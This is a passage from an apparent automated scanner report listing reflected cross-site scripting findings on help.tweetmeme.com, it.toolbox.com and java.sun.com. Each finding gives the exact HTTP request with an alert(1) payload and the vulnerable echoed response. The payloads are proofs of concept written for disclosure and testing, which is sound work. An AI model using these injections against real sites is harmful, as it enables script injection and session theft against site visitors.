GET /forum?e562a"><script>alert(1)</script>99f9c1b1735=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
<meta http-equiv="Content-Type
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forum/?e562a\"><script>alert(1)</script>99f9c1b1735=1"/>
...[SNIP]...

4.95. http://help.tweetmeme.com/forum/forum/33 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/forum/forum/33

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f738"><script>alert(1)</script>0141cb18ee4 was submitted in the REST URL parameter 1. This input was echoed as 9f738\"><script>alert(1)</script>0141cb18ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum9f738"><script>alert(1)</script>0141cb18ee4/forum/33 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:03:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=a8229kumo17amruah44grvptv2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:03:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forum9f738\"><script>alert(1)</script>0141cb18ee4/forum/33"/>
...[SNIP]...

4.96. http://help.tweetmeme.com/forum/forum/33 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/forum/forum/33

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 393ca"><script>alert(1)</script>7d3c1bd86b was submitted in the REST URL parameter 2. This input was echoed as 393ca\"><script>alert(1)</script>7d3c1bd86b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum/forum393ca"><script>alert(1)</script>7d3c1bd86b/33 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:04:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Content-Length: 5493
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
<meta http-equiv="Content-Type
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forum/forum393ca\"><script>alert(1)</script>7d3c1bd86b/33"/>
...[SNIP]...

4.97. http://help.tweetmeme.com/forum/forum/33 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/forum/forum/33

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67758"><script>alert(1)</script>39ac6fd433d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67758\"><script>alert(1)</script>39ac6fd433d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forum/forum/33?67758"><script>alert(1)</script>39ac6fd433d=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Content-Length: 6418
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
<meta http-equiv="Content-Type
...[SNIP]...
<input type="hidden" name="redirect_to" value="/forum/forum/33?67758\"><script>alert(1)</script>39ac6fd433d=1"/>
...[SNIP]...

4.98. http://help.tweetmeme.com/language/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/language/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1c8d"><script>alert(1)</script>cecec83a76b was submitted in the REST URL parameter 1. This input was echoed as d1c8d\"><script>alert(1)</script>cecec83a76b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /languaged1c8d"><script>alert(1)</script>cecec83a76b/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 15:03:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=d2p69qb6bfvb1r9mgfk42ek456; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:03:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/languaged1c8d\"><script>alert(1)</script>cecec83a76b/"/>
...[SNIP]...

4.99. http://help.tweetmeme.com/language/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.tweetmeme.com
Path:	/language/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf3ca"><script>alert(1)</script>0e9f8580517 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf3ca\"><script>alert(1)</script>0e9f8580517 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /language/?bf3ca"><script>alert(1)</script>0e9f8580517=1 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tlgt0pm327qnihddeunb2kgsb5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="redirect_to" value="/language/?bf3ca\"><script>alert(1)</script>0e9f8580517=1"/>
...[SNIP]...

4.100. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-soup

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d69a7'-alert(1)-'c1a27e37df1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/database-soup?d69a7'-alert(1)-'c1a27e37df1=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61207
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:05:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-soup%26d69a7'-alert(1)-'c1a27e37df1%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.101. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-talk

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0d02'-alert(1)-'7a9deb3bef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/database-talk?a0d02'-alert(1)-'7a9deb3bef=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63474
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
aBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-talk%26a0d02'-alert(1)-'7a9deb3bef%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.102. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2luw

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f251b'-alert(1)-'af2755a203c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/db2luw?f251b'-alert(1)-'af2755a203c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2luw%26f251b'-alert(1)-'af2755a203c%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.103. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2zos

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6998'-alert(1)-'a4d3ae29ef8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/db2zos?a6998'-alert(1)-'a4d3ae29ef8=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78422
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
r != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2zos%26a6998'-alert(1)-'a4d3ae29ef8%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.104. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/elsua

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1a8f'-alert(1)-'473f3fe4b3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/elsua?e1a8f'-alert(1)-'473f3fe4b3a=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64515
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
er != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3delsua%26e1a8f'-alert(1)-'473f3fe4b3a%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.105. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/juice-analytics

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 602f7'-alert(1)-'c16e07e8cc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/juice-analytics?602f7'-alert(1)-'c16e07e8cc1=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61930
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
tnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3djuice-analytics%26602f7'-alert(1)-'c16e07e8cc1%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.106. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/minimalit

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fa7d'-alert(1)-'426dac5f4eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/minimalit?6fa7d'-alert(1)-'426dac5f4eb=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60162
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:03:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dminimalit%266fa7d'-alert(1)-'426dac5f4eb%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.107. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/penguinista-databasiensis

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47ced'-alert(1)-'96af22e58e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/penguinista-databasiensis?47ced'-alert(1)-'96af22e58e=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46114
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...

{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dpenguinista-databasiensis%2647ced'-alert(1)-'96af22e58e%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.108. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/ppmtoday

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 306f2'-alert(1)-'2382eb5920b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63706
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26306f2'-alert(1)-'2382eb5920b%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

4.109. http://java.sun.com/products/plugin/autodl [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://java.sun.com
Path:	/products/plugin/autodl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9722"style%3d"x%3aexpression(alert(1))"ce67ab2234b was submitted in the REST URL parameter 1. This input was echoed as f9722"style="x:expression(alert(1))"ce67ab2234b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /productsf9722"style%3d"x%3aexpression(alert(1))"ce67ab2234b/plugin/autodl HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:09:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>

<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/productsf9722"style="x:expression(alert(1))"ce67ab2234b/plugin/autodl
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.110. http://java.sun.com/products/plugin/autodl [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://java.sun.com
Path:	/products/plugin/autodl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491eb"style%3d"x%3aexpression(alert(1))"2f39587331b was submitted in the REST URL parameter 2. This input was echoed as 491eb"style="x:expression(alert(1))"2f39587331b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin491eb"style%3d"x%3aexpression(alert(1))"2f39587331b/autodl HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:10:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>

<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin491eb"style="x:expression(alert(1))"2f39587331b/autodl
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.111. http://java.sun.com/products/plugin/autodl [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://java.sun.com
Path:	/products/plugin/autodl

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cda2"style%3d"x%3aexpression(alert(1))"ceeb973e53 was submitted in the REST URL parameter 3. This input was echoed as 2cda2"style="x:expression(alert(1))"ceeb973e53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin/2cda2"style%3d"x%3aexpression(alert(1))"ceeb973e53 HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:12:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>

<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin/2cda2"style="x:expression(alert(1))"ceeb973e53
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.112. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://java.sun.com
Path:	/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6036f"style%3d"x%3aexpression(alert(1))"1d04adb81fe was submitted in the REST URL parameter 1. This input was echoed as 6036f"style="x:expression(alert(1))"1d04adb81fe in the application's response.

